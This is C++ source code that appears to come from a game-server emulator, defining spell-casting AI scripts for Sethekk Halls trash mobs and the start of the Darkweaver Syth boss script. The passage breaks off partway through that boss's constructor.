// is "armed" on one AI tick and cast on the following tick.
class TIMELOSTCONTROLLERAI : public CreatureAIScript
{
public:
	ADD_CREATURE_FACTORY_FUNCTION(TIMELOSTCONTROLLERAI);
	SP_AI_Spell spells[1];   // scripted spell table
	bool m_spellcheck[1];    // per-spell "armed, cast next tick" flag

	TIMELOSTCONTROLLERAI(Creature* pCreature) : CreatureAIScript(pCreature)
	{
		nrspells = 1;
		for(int i=0;i<nrspells;i++)
		{
			m_spellcheck[i] = false;
		}
		spells[0].info = sSpellStore.LookupEntry(SHIRNK);
		spells[0].targettype = TARGET_ATTACKING;
		spells[0].instant = true;
		spells[0].perctrigger = 10.0f;
		spells[0].attackstoptimer = 1000;
		/*
		spells[1].info = sSpellStore.LookupEntry(CONTROL_TOTEM);
		spells[1].targettype = TARGET_;
		spells[1].instant = false;
		spells[1].perctrigger = 0.0f;
		spells[1].attackstoptimer = 1000;
		*/
	}

	// Start periodic AI updates at the unit's base attack speed.
	void OnCombatStart(Unit* mTarget)
	{
		RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
	}

	// Reset the AI interface and stop updates when combat ends.
	void OnCombatStop(Unit *mTarget)
	{
		_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
		_unit->GetAIInterface()->SetAIState(STATE_IDLE);
		RemoveAIUpdateEvent();
	}

	void OnDied(Unit * mKiller)
	{
		RemoveAIUpdateEvent();
	}

	// Roll once per tick and feed the result to the spell selector.
	void AIUpdate()
	{
		float val = sRand.rand(100.0f);
		SpellCast(val);
	}

	// Cast any armed spell, otherwise arm the spell whose cumulative
	// probability bracket contains val.  Idle-and-has-target gate.
	void SpellCast(float val)
	{
		if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
		{
			float comulativeperc = 0;
			Unit *target = NULL;
			for(int i=0;i<nrspells;i++)
			{
				if(!spells[i].perctrigger) continue;
				if(m_spellcheck[i])
				{
					target = _unit->GetAIInterface()->GetNextTarget();
					switch(spells[i].targettype)
					{
						case TARGET_SELF:
						case TARGET_VARIOUS:
							_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
						case TARGET_ATTACKING:
							_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
						case TARGET_DESTINATION:
							_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
					}
					m_spellcheck[i] = false;
					return;
				}
				if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
				{
					_unit->setAttackTimer(spells[i].attackstoptimer, false);
					m_spellcheck[i] = true;
				}
				comulativeperc += spells[i].perctrigger;
			}
		}
	}

protected:
	int nrspells;
};
// Time-Lost Scryer AI
#define CN_TIME_LOST_SCRYER 20697
#define FLASH_HEAL 38588 // let's try this one
#define ARCANE_MISSILES 35034 // and those: 35033, 35034 // doesn't work somehow
// Time-Lost Scryer trash AI: self-heals with Flash Heal and channels
// Arcane Missiles at its victim (spell ids uncertain, per the defines
// above).  A spell is "armed" on one AI tick and cast on the next.
class TIMELOSTSCRYERAI : public CreatureAIScript
{
public:
	ADD_CREATURE_FACTORY_FUNCTION(TIMELOSTSCRYERAI);
	SP_AI_Spell spells[2];   // scripted spell table
	bool m_spellcheck[2];    // per-spell "armed, cast next tick" flag

	TIMELOSTSCRYERAI(Creature* pCreature) : CreatureAIScript(pCreature)
	{
		nrspells = 2;
		for(int i=0;i<nrspells;i++)
		{
			m_spellcheck[i] = false;
		}
		spells[0].info = sSpellStore.LookupEntry(FLASH_HEAL);
		spells[0].targettype = TARGET_SELF;
		spells[0].instant = true;
		spells[0].perctrigger = 5.0f;
		spells[0].attackstoptimer = 1000;

		spells[1].info = sSpellStore.LookupEntry(ARCANE_MISSILES);
		spells[1].targettype = TARGET_ATTACKING;
		spells[1].instant = false;
		spells[1].perctrigger = 12.0f;
		spells[1].attackstoptimer = 1000;
	}

	// Start periodic AI updates at the unit's base attack speed.
	void OnCombatStart(Unit* mTarget)
	{
		RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
	}

	// Reset the AI interface and stop updates when combat ends.
	void OnCombatStop(Unit *mTarget)
	{
		_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
		_unit->GetAIInterface()->SetAIState(STATE_IDLE);
		RemoveAIUpdateEvent();
	}

	void OnDied(Unit * mKiller)
	{
		RemoveAIUpdateEvent();
	}

	// Roll once per tick and feed the result to the spell selector.
	void AIUpdate()
	{
		float val = sRand.rand(100.0f);
		SpellCast(val);
	}

	// Cast any armed spell, otherwise arm the spell whose cumulative
	// probability bracket contains val.  Idle-and-has-target gate.
	void SpellCast(float val)
	{
		if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
		{
			float comulativeperc = 0;
			Unit *target = NULL;
			for(int i=0;i<nrspells;i++)
			{
				if(!spells[i].perctrigger) continue;
				if(m_spellcheck[i])
				{
					target = _unit->GetAIInterface()->GetNextTarget();
					switch(spells[i].targettype)
					{
						case TARGET_SELF:
						case TARGET_VARIOUS:
							_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
						case TARGET_ATTACKING:
							_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
						case TARGET_DESTINATION:
							_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
					}
					m_spellcheck[i] = false;
					return;
				}
				if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
				{
					_unit->setAttackTimer(spells[i].attackstoptimer, false);
					m_spellcheck[i] = true;
				}
				comulativeperc += spells[i].perctrigger;
			}
		}
	}

protected:
	int nrspells;
};
// Time-Lost Shadowmage AI
#define CN_TIME_LOST_SHADOWMAGE 20698
#define CURSE_OF_THE_DARK_TALON 32682
// Time-Lost Shadowmage trash AI: casts Curse of the Dark Talon on its
// current victim.  A spell is "armed" on one AI tick (attack timer
// paused) and actually cast on the following tick.
class TIMELOSTSHADOWMAGEAI : public CreatureAIScript
{
public:
	ADD_CREATURE_FACTORY_FUNCTION(TIMELOSTSHADOWMAGEAI);
	SP_AI_Spell spells[1];   // scripted spell table
	bool m_spellcheck[1];    // per-spell "armed, cast next tick" flag

	TIMELOSTSHADOWMAGEAI(Creature* pCreature) : CreatureAIScript(pCreature)
	{
		nrspells = 1;
		for(int i=0;i<nrspells;i++)
		{
			m_spellcheck[i] = false;
		}
		spells[0].info = sSpellStore.LookupEntry(CURSE_OF_THE_DARK_TALON);
		spells[0].targettype = TARGET_ATTACKING;
		spells[0].instant = false;
		spells[0].perctrigger = 10.0f;
		spells[0].attackstoptimer = 1000;
	}

	// Start periodic AI updates at the unit's base attack speed.
	void OnCombatStart(Unit* mTarget)
	{
		RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
	}

	// Reset the AI interface and stop updates when combat ends.
	void OnCombatStop(Unit *mTarget)
	{
		_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
		_unit->GetAIInterface()->SetAIState(STATE_IDLE);
		RemoveAIUpdateEvent();
	}

	void OnDied(Unit * mKiller)
	{
		RemoveAIUpdateEvent();
	}

	// Roll once per tick and feed the result to the spell selector.
	void AIUpdate()
	{
		float val = sRand.rand(100.0f);
		SpellCast(val);
	}

	// Cast any armed spell, otherwise arm the spell whose cumulative
	// probability bracket contains val.  Idle-and-has-target gate.
	void SpellCast(float val)
	{
		if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
		{
			float comulativeperc = 0;
			Unit *target = NULL;
			for(int i=0;i<nrspells;i++)
			{
				if(!spells[i].perctrigger) continue;
				if(m_spellcheck[i])
				{
					target = _unit->GetAIInterface()->GetNextTarget();
					switch(spells[i].targettype)
					{
						case TARGET_SELF:
						case TARGET_VARIOUS:
							_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
						case TARGET_ATTACKING:
							_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
						case TARGET_DESTINATION:
							_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
					}
					m_spellcheck[i] = false;
					return;
				}
				if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
				{
					_unit->setAttackTimer(spells[i].attackstoptimer, false);
					m_spellcheck[i] = true;
				}
				comulativeperc += spells[i].perctrigger;
			}
		}
	}

protected:
	int nrspells;
};
// Sethekk Guard AI
#define CN_SETHEKK_GUARD 18323
#define THUNDERCLAP 36214
#define SUNDER_ARMOR 30901 // 1000 arm per use (to 5 uses!) O_O
// Sethekk Guard trash AI: Thunderclap (self-centered AoE cast) and
// Sunder Armor on its current victim.  A spell is "armed" on one AI
// tick and actually cast on the following tick.
class SETHEKKGUARDAI : public CreatureAIScript
{
public:
	ADD_CREATURE_FACTORY_FUNCTION(SETHEKKGUARDAI);
	SP_AI_Spell spells[2];   // scripted spell table
	bool m_spellcheck[2];    // per-spell "armed, cast next tick" flag

	SETHEKKGUARDAI(Creature* pCreature) : CreatureAIScript(pCreature)
	{
		nrspells = 2;
		for(int i=0;i<nrspells;i++)
		{
			m_spellcheck[i] = false;
		}
		spells[0].info = sSpellStore.LookupEntry(THUNDERCLAP);
		spells[0].targettype = TARGET_VARIOUS;
		spells[0].instant = true;
		spells[0].perctrigger = 12.0f;
		spells[0].attackstoptimer = 1000;

		spells[1].info = sSpellStore.LookupEntry(SUNDER_ARMOR);
		spells[1].targettype = TARGET_ATTACKING;
		spells[1].instant = true;
		spells[1].perctrigger = 8.0f;
		spells[1].attackstoptimer = 1000;
	}

	// Start periodic AI updates at the unit's base attack speed.
	void OnCombatStart(Unit* mTarget)
	{
		RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
	}

	// Reset the AI interface and stop updates when combat ends.
	void OnCombatStop(Unit *mTarget)
	{
		_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
		_unit->GetAIInterface()->SetAIState(STATE_IDLE);
		RemoveAIUpdateEvent();
	}

	void OnDied(Unit * mKiller)
	{
		RemoveAIUpdateEvent();
	}

	// Roll once per tick and feed the result to the spell selector.
	void AIUpdate()
	{
		float val = sRand.rand(100.0f);
		SpellCast(val);
	}

	// Cast any armed spell, otherwise arm the spell whose cumulative
	// probability bracket contains val.  Idle-and-has-target gate.
	void SpellCast(float val)
	{
		if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
		{
			float comulativeperc = 0;
			Unit *target = NULL;
			for(int i=0;i<nrspells;i++)
			{
				if(!spells[i].perctrigger) continue;
				if(m_spellcheck[i])
				{
					target = _unit->GetAIInterface()->GetNextTarget();
					switch(spells[i].targettype)
					{
						case TARGET_SELF:
						case TARGET_VARIOUS:
							_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
						case TARGET_ATTACKING:
							_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
						case TARGET_DESTINATION:
							_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
					}
					m_spellcheck[i] = false;
					return;
				}
				if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
				{
					_unit->setAttackTimer(spells[i].attackstoptimer, false);
					m_spellcheck[i] = true;
				}
				comulativeperc += spells[i].perctrigger;
			}
		}
	}

protected:
	int nrspells;
};
// Sethekk Initiate AI
#define CN_SETHEKK_INITIATE 18318
#define MAGIC_REFLECTION 20223 // 20223 or 20619
class SETHEKKINITIATEAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(SETHEKKINITIATEAI);
SP_AI_Spell spells[1];
bool m_spellcheck[1];
SETHEKKINITIATEAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 1;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(MAGIC_REFLECTION);
spells[0].targettype = TARGET_SELF;
spells[0].instant = true;
spells[0].perctrigger = 10.0f;
spells[0].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// Sethekk Oracle AI
#define CN_SETHEKK_ORACLE 18328
#define FAERIE_FIRE 21670 // 20656 or 21670 or 32129 or other
#define ARCANE_LIGHTNING 38146 // 38146, 32690 or 38634
// Sethekk Oracle trash AI: Faerie Fire and Arcane Lightning on its
// current victim (spell ids uncertain, per the defines above).  A spell
// is "armed" on one AI tick and actually cast on the following tick.
class SETHEKKORACLEAI : public CreatureAIScript
{
public:
	ADD_CREATURE_FACTORY_FUNCTION(SETHEKKORACLEAI);
	SP_AI_Spell spells[2];   // scripted spell table
	bool m_spellcheck[2];    // per-spell "armed, cast next tick" flag

	SETHEKKORACLEAI(Creature* pCreature) : CreatureAIScript(pCreature)
	{
		nrspells = 2;
		for(int i=0;i<nrspells;i++)
		{
			m_spellcheck[i] = false;
		}
		spells[0].info = sSpellStore.LookupEntry(FAERIE_FIRE);
		spells[0].targettype = TARGET_ATTACKING;
		spells[0].instant = true;
		spells[0].perctrigger = 8.0f;
		spells[0].attackstoptimer = 1000;

		spells[1].info = sSpellStore.LookupEntry(ARCANE_LIGHTNING);
		spells[1].targettype = TARGET_ATTACKING;
		spells[1].instant = false;
		spells[1].perctrigger = 15.0f;
		spells[1].attackstoptimer = 1000;
	}

	// Start periodic AI updates at the unit's base attack speed.
	void OnCombatStart(Unit* mTarget)
	{
		RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
	}

	// Reset the AI interface and stop updates when combat ends.
	void OnCombatStop(Unit *mTarget)
	{
		_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
		_unit->GetAIInterface()->SetAIState(STATE_IDLE);
		RemoveAIUpdateEvent();
	}

	void OnDied(Unit * mKiller)
	{
		RemoveAIUpdateEvent();
	}

	// Roll once per tick and feed the result to the spell selector.
	void AIUpdate()
	{
		float val = sRand.rand(100.0f);
		SpellCast(val);
	}

	// Cast any armed spell, otherwise arm the spell whose cumulative
	// probability bracket contains val.  Idle-and-has-target gate.
	void SpellCast(float val)
	{
		if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
		{
			float comulativeperc = 0;
			Unit *target = NULL;
			for(int i=0;i<nrspells;i++)
			{
				if(!spells[i].perctrigger) continue;
				if(m_spellcheck[i])
				{
					target = _unit->GetAIInterface()->GetNextTarget();
					switch(spells[i].targettype)
					{
						case TARGET_SELF:
						case TARGET_VARIOUS:
							_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
						case TARGET_ATTACKING:
							_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
						case TARGET_DESTINATION:
							_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
					}
					m_spellcheck[i] = false;
					return;
				}
				if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
				{
					_unit->setAttackTimer(spells[i].attackstoptimer, false);
					m_spellcheck[i] = true;
				}
				comulativeperc += spells[i].perctrigger;
			}
		}
	}

protected:
	int nrspells;
};
// Sethekk Prophet AI
#define CN_SETHEKK_PROPHET 18325
#define FEAR 32241 // Should it be aoe or normal? // damn it fears caster too
//#define // Ghost spawning similar to those in Sunken Temple
class SETHEKKPROPHETAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(SETHEKKPROPHETAI);
SP_AI_Spell spells[1];
bool m_spellcheck[1];
SETHEKKPROPHETAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 1;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(FEAR);
spells[0].targettype = TARGET_ATTACKING;
spells[0].instant = true;
spells[0].perctrigger = 8.0f;
spells[0].attackstoptimer = 1000;
/*
spells[1].info = sSpellStore.LookupEntry();
spells[1].targettype = TARGET_;
spells[1].instant = true;
spells[1].perctrigger = 0.0f;
spells[1].attackstoptimer = 1000;
*/
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// Sethekk Ravenguard AI
#define CN_SETHEKK_RAVENGUARD 18322
#define BLOODTHIRST 31996 // check also spells like this: 31996 and this: 35948
#define HOWLING_SCREECH 32651
// Sethekk Ravenguard AI (creature entry 18322).
// Melee trash mob: may use Bloodthirst (10%) on its target or
// Howling Screech (8%) as an area effect.
class SETHEKKRAVENGUARDAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(SETHEKKRAVENGUARDAI);
SP_AI_Spell spells[2];
// Armed-flags: set when a roll selects a spell, cleared when it is cast.
bool m_spellcheck[2];
SETHEKKRAVENGUARDAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 2;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
// Spell 0: Bloodthirst, instant on the attack target, 10% per tick.
spells[0].info = sSpellStore.LookupEntry(BLOODTHIRST);
spells[0].targettype = TARGET_ATTACKING; //?
spells[0].instant = true;
spells[0].perctrigger = 10.0f;
spells[0].attackstoptimer = 1000;
// Spell 1: Howling Screech, instant AoE (cast at self), 8% per tick.
spells[1].info = sSpellStore.LookupEntry(HOWLING_SCREECH);
spells[1].targettype = TARGET_VARIOUS;
spells[1].instant = true;
spells[1].perctrigger = 8.0f;
spells[1].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
// Tick AIUpdate() at the creature's base attack interval.
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
// Reset AI to idle and stop ticking.
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
// Roll in [0, 100) once per tick.
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
// Only act when not already casting and a target exists.
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
// Lower bound of each spell's probability band.
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
// Spell was armed on an earlier tick -- cast it now.
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
// Arm when the roll lands in (comulativeperc, comulativeperc + perctrigger].
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// Sethekk Shaman AI
#define CN_SETHEKK_SHAMAN 18326
#define SUMMON_DARK_VORTEX 32663 //SUMMON_VOIDWALKER 30208 // Shouldn't be Dark Vortex (spell id: 32663) ?
class SETHEKKSHAMANAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(SETHEKKSHAMANAI);
SP_AI_Spell spells[1];
bool m_spellcheck[1];
SETHEKKSHAMANAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 1;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(SUMMON_DARK_VORTEX);
spells[0].targettype = TARGET_SELF;
spells[0].instant = true;
spells[0].perctrigger = 8.0f;
spells[0].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// Sethekk Talon Lord AI
#define CN_SETHEKK_TALON_LORD 18321
#define TALON_OF_JUSTICE 32654 // 32654 or 39229
#define AVENGERS_SHIELD 32774 // On WoWWiki is Shield of Revenge, but that should be it. Also spells that can be: 32774, 32674, 37554
// Sethekk Talon Lord AI (creature entry 18321).
// Trash mob: may use Talon of Justice (10%) or Avenger's Shield (7%)
// on its current attack target.
//
// Fix: removed the unused, never-initialized 'Unit *target' data member.
// It was always shadowed by the local 'target' in SpellCast() and was
// never read, so it only risked an accidental dangling-pointer use.
class SETHEKKTALONLORDAI : public CreatureAIScript
{
public:
    ADD_CREATURE_FACTORY_FUNCTION(SETHEKKTALONLORDAI);
    SP_AI_Spell spells[2];
    // Armed-flags: set when a roll selects a spell, cleared when it is cast.
    bool m_spellcheck[2];

    SETHEKKTALONLORDAI(Creature* pCreature) : CreatureAIScript(pCreature)
    {
        nrspells = 2;
        for(int i = 0; i < nrspells; i++)
        {
            m_spellcheck[i] = false;
        }
        // Spell 0: Talon of Justice, instant, 10% chance per tick.
        spells[0].info = sSpellStore.LookupEntry(TALON_OF_JUSTICE);
        spells[0].targettype = TARGET_ATTACKING;
        spells[0].instant = true;
        spells[0].perctrigger = 10.0f;
        spells[0].attackstoptimer = 1000;
        // Spell 1: Avenger's Shield, instant, 7% chance per tick.
        spells[1].info = sSpellStore.LookupEntry(AVENGERS_SHIELD);
        spells[1].targettype = TARGET_ATTACKING;
        spells[1].instant = true;
        spells[1].perctrigger = 7.0f;
        spells[1].attackstoptimer = 1000;
    }

    void OnCombatStart(Unit* mTarget)
    {
        // Tick AIUpdate() at the creature's base attack interval.
        RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
    }

    void OnCombatStop(Unit *mTarget)
    {
        // Reset AI to idle and stop ticking.
        _unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
        _unit->GetAIInterface()->SetAIState(STATE_IDLE);
        RemoveAIUpdateEvent();
    }

    void OnDied(Unit * mKiller)
    {
        RemoveAIUpdateEvent();
    }

    void AIUpdate()
    {
        // Roll in [0, 100) once per tick.
        float val = sRand.rand(100.0f);
        SpellCast(val);
    }

    void SpellCast(float val)
    {
        // Only act when not already casting and a target exists.
        if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
        {
            // Lower bound of each spell's probability band.
            float comulativeperc = 0;
            Unit *target = NULL;
            for(int i = 0; i < nrspells; i++)
            {
                if(!spells[i].perctrigger) continue;
                if(m_spellcheck[i])
                {
                    // Spell was armed on an earlier tick -- cast it now.
                    target = _unit->GetAIInterface()->GetNextTarget();
                    switch(spells[i].targettype)
                    {
                    case TARGET_SELF:
                    case TARGET_VARIOUS:
                        _unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
                    case TARGET_ATTACKING:
                        _unit->CastSpell(target, spells[i].info, spells[i].instant); break;
                    case TARGET_DESTINATION:
                        _unit->CastSpellAoF(target->GetPositionX(), target->GetPositionY(), target->GetPositionZ(), spells[i].info, spells[i].instant); break;
                    }
                    m_spellcheck[i] = false;
                    return;
                }
                // Arm when the roll lands in (comulativeperc, comulativeperc + perctrigger].
                if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
                {
                    _unit->setAttackTimer(spells[i].attackstoptimer, false);
                    m_spellcheck[i] = true;
                }
                comulativeperc += spells[i].perctrigger;
            }
        }
    }

protected:
    int nrspells;
};
/*****************************/
/* */
/* Boss AIs */
/* */
/*****************************/
// Darkweaver SythAI
#define CN_DARKWEAVER_SYTH 18472
// Spells
#define FROST_SHOCK 25464 // Workaround as this is player spell, but with proly same effect. (lower dmg - 37865, higher dmg - 37332)
#define FLAME_SHOCK 34354 // To small dmg, need to find better one
#define SHADOW_SHOCK 30138 // SELF IN DESCR. ?_? I think more accurate can be found (but this is quiet good)
#define ARCANE_SHOCK 33175 // I think better can be found, but still it's good
#define CHAIN_LIGHTNING 33643 // Couldn't find more info about this spell?
// Summons
#define SUMMON_SYTH_FIRE_ELEMENTAL 33537 //needs more core support, but those are correct ids!
#define SUMMON_SYTH_FROST_ELEMENTAL 33539
#define SUMMON_SYTH_ARCANE_ELEMENTAL 33538
#define SUMMON_SYTH_SHADOW_ELEMENTAL 33540
// Darkweaver Syth -- first boss of Sethekk Halls (creature entry 18472).
// Rotates five nukes (frost/flame/shadow/arcane shock + chain lightning),
// and at 75%/50%/25% health summons one wave of four elementals
// (fire, frost, arcane, shadow).  SUMMON_LIMITER counts which wave is next.
//
// Fix: removed two 'sRand.randInt(1000);' statements whose return value
// was discarded -- the yell selection uses plain rand(), exactly as before.
class DARKWEAVERSYTHAI : public CreatureAIScript
{
public:
    ADD_CREATURE_FACTORY_FUNCTION(DARKWEAVERSYTHAI);
    SP_AI_Spell spells[9];
    // Armed-flags: set when a roll selects a spell, cleared when it is cast.
    bool m_spellcheck[9];

    DARKWEAVERSYTHAI(Creature* pCreature) : CreatureAIScript(pCreature)
    {
        SUMMON_LIMITER = 1;
        nrspells = 9;
        for(int i = 0; i < nrspells; i++)
        {
            m_spellcheck[i] = false;
        }
        // Spells 0-4: combat rotation, selected randomly in SpellCast().
        spells[0].info = sSpellStore.LookupEntry(FROST_SHOCK);
        spells[0].targettype = TARGET_ATTACKING;
        spells[0].instant = true;
        spells[0].perctrigger = 9.0f;
        spells[0].attackstoptimer = 1000;
        spells[1].info = sSpellStore.LookupEntry(FLAME_SHOCK);
